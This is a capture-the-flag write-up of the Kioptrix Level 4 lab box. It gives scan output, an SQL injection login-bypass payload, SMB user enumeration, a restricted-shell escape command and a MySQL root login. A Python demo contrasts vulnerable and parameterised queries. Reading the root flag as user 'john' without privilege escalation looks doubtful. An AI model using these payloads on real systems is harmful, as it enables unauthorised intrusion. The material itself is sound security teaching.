Kioptrix Level 4 Writeup

The goal is to get root access and retrieve the flag in the ‘root’ directory.

Kioptrix Level 4 VulnHub link below:
Kioptrix Level 4 download page

1.1 Enumeration


A port scan reveals that 4 ports are open (22, 80, 139 and 445).

nmap -T4 -sV -A -oA nmap-scan 192.168.0.73
Nmap scan report for 192.168.0.73
Host is up (0.00027s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesnt have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 2h49m42s, median: 0s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2019-04-15T15:34:29-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)


1.2 SSH


The SSH version does not appear to have any known vulnerabilities. However, SSH could still have weak credentials.

1.3 HTTP Login with SQLI

The login page could potentially be vulnerable to SQL injection. To check for SQLi, the following is entered:

Username: admin
Password: 1' or 1 = 1#

Login successful!
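To show why the payload above bypasses the login, and how a parameterised query stops it, here is an added Python example (not the box's own PHP code). It assumes a ‘members’ table with username and password columns, uses an in-memory SQLite database with constructed rows, and, because SQLite has no MySQL-style ‘#’ line comment, emulates that comment handling for the vulnerable path.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the box's 'members' database.
    # Only john's password comes from the writeup; robert's is a placeholder.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO members (username, password) VALUES (?, ?)",
        [("john", "MyNameIsJohn"), ("robert", "PLACEHOLDER_robert_pw")],
    )
    conn.commit()
    return conn


def emulate_mysql_comment(sql):
    # MySQL treats '#' as a comment running to end of line; SQLite does not.
    # Dropping the tail here reproduces what the box's MySQL backend executes.
    return sql.split("#", 1)[0]


def login_vulnerable(conn, username, password):
    # Query built by string concatenation: the pattern that makes the bypass work.
    # With the payload, the WHERE clause becomes
    #   username='admin' AND password='1' or 1 = 1
    # and since AND binds tighter than OR, every row matches.
    sql = (
        "SELECT username FROM members WHERE username='%s' AND password='%s'"
        % (username, password)
    )
    row = conn.execute(emulate_mysql_comment(sql)).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    # Parameterised query: the input is bound as data and never parsed as SQL.
    row = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "1' or 1 = 1#"
    print("vulnerable:", login_vulnerable(db, "admin", payload))  # first row: john
    print("hardened:  ", login_hardened(db, "admin", payload))    # None
```

The vulnerable path also returns the first matching row rather than the requested account, which is why the writeup lands on a user other than ‘admin’. Storing passwords in plaintext, as this table does, is a second defect the hardened query alone does not fix.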

1.4 HTTP Testing for LFI


The URL carries the parameter username=Admin, so LFI is tested here. However, every file requested returns ‘permission denied’. This appears to be a dead end.

1.5 SMB Enumeration

Enum4linux is run to attempt to enumerate users:



Several users are revealed:

-> nobody
-> robert
-> root
-> john
-> loneferret


The users can be further tested on the website and SSH.

2.1 Exploitation


A dictionary attack over SSH against these usernames is attempted, but it does not succeed. Next, the enumerated users are tried on the web login page. The page for the ‘john’ user shows the password in plaintext: ‘MyNameIsJohn’.

Since SSH is open, the collected credentials are tried over SSH, and the login succeeds. However, the shell is restricted, with only a few commands available.



After some research, I found a way to escape a restricted shell using the echo command to execute the following:

echo os.system('/bin/bash')

This successfully invokes a bash shell with the user id of ‘john’.

Found on this link: Escaping/Bypass From Jail/Restricted Linux Shells

3.1 Post Exploitation


I then changed directory to the ‘root’ directory and found a ‘congrats.txt’ file, which contained the flag!



Looking around the file system, a MySQL username and password are found in the web server files under ‘/var/www’. The login PHP file contains the following:


Username: root
There is no password for root.

When logging in to MySQL, I was easily able to enumerate the databases.



The databases are:

-> information_schema
-> members
-> mysql


After further enumeration of MySQL, I was able to find the user accounts for the usernames ‘john’ and ‘robert’.



Success!

The flag has been retrieved and the MySQL database has been enumerated.